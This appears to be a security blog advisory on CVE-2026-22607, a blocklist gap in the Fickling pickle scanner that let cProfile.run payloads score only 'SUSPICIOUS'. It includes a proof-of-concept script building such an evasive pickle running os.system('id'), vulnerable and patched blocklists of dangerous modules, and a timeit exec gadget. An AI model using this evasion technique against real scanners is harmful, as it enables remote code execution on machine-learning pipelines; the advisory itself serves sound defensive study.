Feb 23, 2026 · 5 min read
Fickling's blocklist missed `cProfile` and other standard-library modules. An attacker can use `cProfile.run()` to execute arbitrary code inside a pickle, and Fickling flags the result as merely "SUSPICIOUS", letting the exploit slip past automated security checks that only block on an "OVERTLY_MALICIOUS" verdict.
Fickling, a specialized tool designed to analyze and decompile Python pickles safely, contained a critical oversight in its blocklist logic. By failing to flag the `cProfile` module and other standard libraries as dangerous, Fickling allowed attackers to craft malicious pickles that execute arbitrary code while only being flagged as "SUSPICIOUS" rather than "OVERTLY_MALICIOUS." This effectively bypasses the security gates relying on Fickling's severity ratings.
Python's pickle module is notoriously dangerous. The documentation itself practically screams "DO NOT USE ON UNTRUSTED DATA." Yet, the world runs on serialized data, and machine learning models (often distributed as pickles) are everywhere. Enter Fickling, a tool by Trail of Bits designed to decompile, analyze, and—crucially—judge the safety of these binary blobs. Ideally, it acts as a bomb squad robot: it x-rays the package and tells you if it's going to blow up your server.
But here's the irony: building a safety scanner for a format that is essentially a stack-based virtual machine is incredibly hard. You have to anticipate every way an attacker might invoke code execution. In CVE-2026-22607, we see what happens when the scanner knows about the front door (`os.system`) and the back door (`subprocess.Popen`), but forgets that the house also has a doggy door labeled `cProfile`. This vulnerability isn't a buffer overflow; it's a logic flaw where a "profiling tool" becomes a weapon of mass destruction.
Fickling works by symbolically executing the pickle bytecode to build an Abstract Syntax Tree (AST). It then runs heuristics over this AST to detect "unsafe" imports or calls. This is a classic blocklist approach (CWE-184). The developers correctly identified that `os`, `sys`, and `subprocess` are dangerous. If a pickle tries to import `os` and call `system`, Fickling screams "OVERTLY_MALICIOUS."
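Fickling's real analysis is AST-based, but the import-detection idea can be sketched with nothing more than the standard `pickletools` module. The scanner below is a simplified, hypothetical toy, not Fickling's actual code:

```python
import pickle
import pickletools

def imported_names(data: bytes):
    """Toy sketch: recover (module, qualname) pairs a pickle resolves
    via GLOBAL/STACK_GLOBAL opcodes. Real Fickling builds a full AST."""
    found, strings = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
            strings.append(arg)  # remember pushed strings
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            # STACK_GLOBAL consumes the two most recent strings
            found.append((strings[-2], strings[-1]))
        elif opcode.name == "GLOBAL":
            # older opcode: argument is "module name" as one string
            module, name = arg.split(" ", 1)
            found.append((module, name))
    return found

# Any pickled function reference shows up as an import:
print(imported_names(pickle.dumps(len, protocol=4)))  # [('builtins', 'len')]
```

A real analyzer then compares these names against its blocklist, which is exactly where this CVE lives.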
However, Python's standard library is massive and full of gadgets. The flaw here was the omission of `cProfile`. To a developer, `cProfile` is a tool for optimizing code performance. To a hacker, `cProfile.run(command)` is just `exec(command)` with a fancy mustache. Because `cProfile` wasn't on the `UNSAFE_IMPORTS` list, Fickling saw it, shrugged, and let it pass. It might flag the pickle as "SUSPICIOUS" due to other heuristics (like weird variable usage), but in many automated pipelines, "SUSPICIOUS" is treated as "probably fine," whereas "OVERTLY_MALICIOUS" is "burn it with fire." This distinction is the difference between a blocked attack and a shell on your server.
Let's look at the "security" logic before the patch. The `UnsafeImports` analysis relied on a hardcoded set of module names. If the module wasn't in the set, it wasn't unsafe.
Vulnerable Code (Concept):

```python
UNSAFE_IMPORTS = {
    "os", "sys", "subprocess", "shutil", ...
}

if node.module in UNSAFE_IMPORTS:
    severity = OVERTLY_MALICIOUS
```

The patch in version 0.1.7 didn't just add `cProfile`; the maintainers recognized that the list was woefully incomplete. They added `runpy` (executes files), `ctypes` (loads C libraries), `pydoc` (locates objects), and `importlib`. Furthermore, they hardened the matching logic.
Patched Code (Simplified):

```python
# Expanded blocklist
UNSAFE_IMPORTS = {
    "os", "sys", "subprocess", "cProfile", "runpy",
    "ctypes", "pydoc", "importlib", "code", "multiprocessing", ...
}

# Better matching logic to catch submodules
if any(comp in UNSAFE_IMPORTS for comp in node.module.split('.')):
    severity = OVERTLY_MALICIOUS
```

They also fixed a visibility gap where imports of `builtins` weren't generating AST nodes, meaning attacks using `builtins.__import__` were effectively invisible to the analyzer.
To exploit this, we don't need memory corruption. We just need to speak the language of the Pickle Virtual Machine (PVM). We want to invoke `cProfile.run('print("PWNED")')`. In pickle terms, we load the global `cProfile.run`, push a string argument, and call `REDUCE`.
Here is what that looks like in a Python script generating the payload:

```python
import pickle
import pickletools
from fickling.fickle import Pickled, op

# The payload string is passed to cProfile.run(), which passes it to exec()
payload_code = "import os; os.system('id')"

# Constructing the malicious pickle manually using Fickling's own tools
pickled = Pickled([
    op.Proto.create(5),
    op.ShortBinUnicode("cProfile"),
    op.Memoize(),
    op.ShortBinUnicode("run"),
    op.Memoize(),
    op.StackGlobal(),               # Resolves cProfile.run
    op.Memoize(),
    op.ShortBinUnicode(payload_code),
    op.Memoize(),
    op.TupleOne(),                  # Creates a tuple of arguments: (payload_code,)
    op.Memoize(),
    op.Reduce(),                    # Calls cProfile.run(payload_code)
    op.Memoize(),
    op.Stop(),
])

print(f"Generated payload length: {len(pickled.dumps())}")
# When Fickling <= 0.1.6 scans this, it returns Severity.SUSPICIOUS
# When Python unpickles this, it executes the code.
```

The beauty of this exploit is its simplicity: it uses standard library features exactly as designed, just in a context the security tool deemed "safe enough."
Why does the distinction between SUSPICIOUS and OVERTLY_MALICIOUS matter? Because of alert fatigue and automated policy.
Security tools like Fickling are often used in pipelines (e.g., scanning uploaded ML models). If Fickling flags everything as "SUSPICIOUS" (which can happen with complex, benign pickles), operators might tune their policy to only block "OVERTLY_MALICIOUS" findings. By abusing `cProfile`, an attacker slides under this threshold.
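A typical policy gate makes the problem concrete. This is a hypothetical sketch; the enum mirrors Fickling's severity tiers conceptually, not its exact API:

```python
from enum import IntEnum

class Severity(IntEnum):
    # Conceptual ordering of verdicts, from least to most severe
    LIKELY_SAFE = 1
    SUSPICIOUS = 2
    OVERTLY_MALICIOUS = 3

def allow_upload(severity: Severity) -> bool:
    # Tuned to avoid alert fatigue: only hard-block the worst verdict
    return severity < Severity.OVERTLY_MALICIOUS

# The cProfile payload scores only SUSPICIOUS on Fickling <= 0.1.6,
# so a gate like this waves it through:
print(allow_upload(Severity.SUSPICIOUS))         # True
print(allow_upload(Severity.OVERTLY_MALICIOUS))  # False
```

Any threshold-based policy inherits the scanner's misclassifications, which is why the severity downgrade is the real vulnerability here.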
The impact is full Remote Code Execution (RCE) with the privileges of the process unpickling the data. In the context of ML pipelines, this often means access to GPU clusters, training data, or model weights. The CVSS score is high (7.8) for a reason—it's a complete bypass of the tool's core value proposition.
The remediation is straightforward: Update to Fickling 0.1.7 or later.
The fix involves a more comprehensive blocklist and structural changes to how imports are analyzed. If you cannot update, you must treat any pickle flagged as "SUSPICIOUS" by Fickling as potentially lethal, specifically looking for imports of `cProfile`, `runpy`, or `ctypes` in the analysis output.
> [!NOTE]
> Developer Lesson: Blocklists are hard. In dynamic languages like Python, there is almost always another way to execute code. `eval`, `exec`, `timeit`, `cProfile`, `pdb`, `code.InteractiveConsole`... the list is endless. If you are building a sandbox or analyzer, assume your blocklist is incomplete.
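The point about endless gadgets is easy to demonstrate: `timeit`, another "harmless" benchmarking helper, also executes arbitrary statements:

```python
import timeit

sink = []
# timeit compiles and exec()s the statement string -- exec() in disguise.
# The globals= parameter lets the statement see our objects.
timeit.timeit("sink.append('pwned')", number=1, globals={"sink": sink})
print(sink)  # ['pwned']
```

Every one of these gadgets is a legitimate standard-library feature, which is exactly why enumerating them all is a losing game.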
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

| Product | Affected Versions | Fixed Version |
|---|---|---|
| fickling (Trail of Bits) | <= 0.1.6 | 0.1.7 |
| Attribute | Detail |
|---|---|
| CWE | CWE-184 (Incomplete List of Disallowed Inputs) |
| Attack Vector | Local / Network (depending on pickle source) |
| CVSS v3.1 | 7.8 (High) |
| CVSS v4.0 | 8.9 (High) |
| Impact | Security Bypass leading to RCE |
| Exploit Status | PoC Available |